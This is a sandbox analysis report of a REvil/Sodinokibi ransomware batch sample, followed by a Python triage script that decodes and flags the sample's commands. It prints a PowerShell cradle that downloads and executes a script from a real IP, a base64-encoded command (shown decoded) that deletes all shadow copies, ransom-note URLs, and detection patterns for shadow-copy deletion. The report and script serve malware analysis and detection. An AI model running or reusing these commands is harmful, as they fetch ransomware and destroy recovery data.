Analysis

max time kernel: 33s
max time network: 37s
platform: windows7_x64
resource: win7v200430
submitted: 01-06-2020 21:10

Static task: static1
Behavioral task: behavioral1
  Sample: c6ed6f3350ae9dc790540c8267fb38a0.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: c6ed6f3350ae9dc790540c8267fb38a0.bat
  Resource: win10v200430

The signatures and process tree below are from the windows7_x64 run (behavioral1, resource win7v200430).
General

Target: c6ed6f3350ae9dc790540c8267fb38a0.bat
Size: 217B
MD5: 0c60f7ecb1fd2c47aab73585757398a8
SHA1: 34721c29de0d1d81960abd13d7c0f25525e584f8
SHA256: 23f68579cba61c408f614172efeb479148851a6bd3da41ae3c07973ae5cb258f
SHA512: 90b9512cee57a6ec7969a611ba125bddb5bcbed3fb3ae2cb83c897b8ea1a2a8f3f006bc6dbdd9c4fc8608c0486e911979856cd2e34806203ebc02c70c6b03b32
Malware Config

Extracted (URL): http://185.103.242.78/pastes/c6ed6f3350ae9dc790540c8267fb38a0
  This is the download target of the PowerShell cradle in the .bat (see the PID 868 command line under Processes). The paste name is the same hex string as the .bat file name, and the fetch is plain HTTP.

Extracted (ransom note): C:\ymlt1-readme.txt
  Family: sodinokibi
  URLs in the note:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB
    http://decryptor.cc/B5220888DF7426CB
  Both URLs share the path component B5220888DF7426CB, which the note uses to identify this victim to the operators' portal; the Tor address and the clearnet domain are alternative routes to the same page.
Signatures

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
  Process: vssvc.exe (PID 332)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  All four keys are written by vssvc.exe itself as its writers initialize. They are a side effect of the shadow-copy deletion issued by PID 1172 starting the VSS service, not a change the malware makes to any service configuration, so this signature should be read together with the PID 1172 command line under Processes rather than as persistence.
Suspicious use of WriteProcessMemory (5 IoCs)
  PID 1520 cmd.exe wrote to memory of PID 868 powershell.exe (1 event)
  PID 868 powershell.exe wrote to memory of PID 1172 powershell.exe (4 events)
  These writes are consistent with each parent creating its child; what they establish is the lineage cmd.exe (1520) -> powershell.exe (868) -> powershell.exe (1172).
Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe (PID 868) for all but two of the 77 entries; powershell.exe (PID 1172) for the remaining two.
Blacklisted process makes network request (1 IoCs)
  flow 3: PID 868 powershell.exe
  The single flagged flow belongs to the process whose command line downloads the paste URL listed under Malware Config.

Sodin, Sodinokibi, REvil (family detection)
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  PID 868 powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  SeDebugPrivilege: PID 868 powershell.exe (2 events)
  SeDebugPrivilege: PID 1172 powershell.exe
  SeTakeOwnershipPrivilege: PID 868 powershell.exe
  SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege: PID 332 vssvc.exe
  The three vssvc.exe privileges are the VSS service's own and appear whenever it runs. The entries worth weighing are those of PID 868, the same process that writes the ransom notes and opens the bait files for modification below; SeTakeOwnershipPrivilege in particular is what an encryptor enables to get write access to files its token would otherwise be refused.
Drops file in Program Files directory (26 IoCs)
  Process: powershell.exe (PID 868)
  File created (ransom note ymlt1-readme.txt, one copy per directory walked, 5 entries):
    \??\c:\program files\ymlt1-readme.txt
    \??\c:\program files (x86)\ymlt1-readme.txt
    \??\c:\program files\microsoft sql server compact edition\ymlt1-readme.txt
    \??\c:\program files\microsoft sql server compact edition\v3.5\ymlt1-readme.txt
    \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ymlt1-readme.txt
  File opened for modification (21 entries, all under \??\c:\program files\):
    PushPop.MTS, RenameSplit.gif, UseWait.mpeg, ConvertFromCompare.aiff, InitializeSubmit.vstm, NewMount.3gpp, ProtectRevoke.xla, RedoRestart.asf, RegisterGet.mp4, UnblockExpand.dot, CheckpointNew.pcx, ClearUnlock.snd, DebugConnect.shtml, DenyAssert.3gp2, MergePop.gif, MountCopy.docx, SyncExit.TS, WatchSync.vb, CloseCompare.001, SkipExpand.ttc, WatchLimit.jpeg
  The files opened for modification carry the sandbox's generated bait-file naming pattern (two verbs plus a document or media extension); opening them for write from the same process that drops the note is the encryption pass. Every entry is attributed to PID 868 and no new executable appears in the process tree, so the ransomware payload runs inside that PowerShell process rather than as a dropped binary.
Processes

C:\Windows\system32\cmd.exe (PID 1520)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\c6ed6f3350ae9dc790540c8267fb38a0.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 868, child of 1520)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c6ed6f3350ae9dc790540c8267fb38a0');Invoke-GEKVCYOWQV;Start-Sleep -s 10000"
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    The .bat starts the 32-bit PowerShell host by its explicit SysWOW64 path, fetches the paste over plain HTTP, evaluates it with IEX, calls a function the downloaded script must have defined (Invoke-GEKVCYOWQV; the name looks generated), and then sleeps so the process stays alive while the payload runs in its memory. Nothing is written to disk before execution, which is why the file and privilege activity above is all attributed to PID 868.

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1172, child of 868)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (the -e argument is base64 of UTF-16LE text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      This deletes every Volume Shadow Copy through WMI, removing the simplest local recovery path; the WMI request is what starts vssvc.exe below.

C:\Windows\system32\vssvc.exe (PID 332)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  The VSS service is started on demand by the service control manager in response to the shadow-copy request from PID 1172, which is why it appears at the top level of the tree rather than under powershell.exe.
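As an added example, not part of the sandbox report, the following Python script does the triage steps an analyst performs on the process tree above: it decodes the child's -e argument, flags the download cradle and the shadow-copy deletion, and rebuilds the parent chain for each finding. The three command lines are copied from the report; the parsing rules, the pattern list, the function names and the output shape are this example's own assumptions and are not Triage's code.

```python
"""Triage helper for the process tree in this report.

Added example, not part of the sandbox report. The command lines below are
copied from the report's process tree; everything else (parsing rules,
patterns, output shape) is this example's own assumption.
"""
import base64
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# (pid, parent pid, command line) as shown in the report's process tree.
PROCESS_TREE: List[Tuple[int, Optional[int], str]] = [
    (1520, None,
     'cmd /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\c6ed6f3350ae9dc790540c8267fb38a0.bat"'),
    (868, 1520,
     'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
     '"IEX (New-Object System.Net.WebClient).DownloadString('
     "'http://185.103.242.78/pastes/c6ed6f3350ae9dc790540c8267fb38a0');"
     'Invoke-GEKVCYOWQV;Start-Sleep -s 10000"'),
    (1172, 868,
     "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings commonly seen. -ex (ExecutionPolicy) deliberately does not match.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
URL = re.compile(r"https?://[^\s'\")]+")
EVALUATES = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
DOWNLOADS = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|invoke-restmethod")
# The WMI form used here plus the two command-line forms other families use.
SHADOW_DELETE = re.compile(
    r"(?i)win32_shadowcopy.*?\.delete\s*\("
    r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
    r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    # powershell.exe expects base64 of UTF-16LE text; an odd byte count means
    # this is not an EncodedCommand payload, so fail loudly instead of guessing.
    if len(raw) % 2:
        raise ValueError("-e argument is not UTF-16LE text")
    return raw.decode("utf-16-le")


def triage_process_tree(tree) -> List[Dict[str, object]]:
    """Flag cradle, encoded command and shadow-copy deletion per PID."""
    findings: List[Dict[str, object]] = []
    for pid, _ppid, cmd in tree:
        script = cmd
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append({"pid": pid, "finding": "encoded_command", "detail": decoded})
            script = decoded  # run the remaining checks on what actually executes
        if EVALUATES.search(script) and DOWNLOADS.search(script):
            for url in URL.findall(script):
                findings.append({"pid": pid, "finding": "download_cradle", "detail": url})
        if SHADOW_DELETE.search(script):
            findings.append({"pid": pid, "finding": "shadow_copy_deletion", "detail": script})
    return findings


def image_name(cmdline: str) -> str:
    """Basename of the image without .exe; handles a quoted image path."""
    if cmdline.startswith('"'):
        image = cmdline[1:cmdline.index('"', 1)]
    else:
        image = cmdline.split(None, 1)[0]
    name = ntpath.basename(image).lower()
    return name[:-4] if name.endswith(".exe") else name


def lineage(tree, pid: int) -> List[str]:
    """Image names from the root of the tree down to pid."""
    by_pid = {p: (pp, cmd) for p, pp, cmd in tree}
    chain: List[str] = []
    while pid in by_pid:
        ppid, cmd = by_pid[pid]
        chain.append(image_name(cmd))
        pid = ppid
    return chain[::-1]


if __name__ == "__main__":
    for f in triage_process_tree(PROCESS_TREE):
        print(f"PID {f['pid']:>5}  {' > '.join(lineage(PROCESS_TREE, f['pid']))}")
        print(f"           {f['finding']}: {f['detail']}")
```

Run stand-alone it prints three findings: the cradle URL on PID 868, and on PID 1172 both the decoded text (Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}) and the shadow-copy deletion match against that decoded text, each with the cmd > powershell > powershell lineage. Running the pattern checks on the decoded script rather than the raw command line is the point: the raw line for PID 1172 contains nothing a string match on "shadowcopy" would catch.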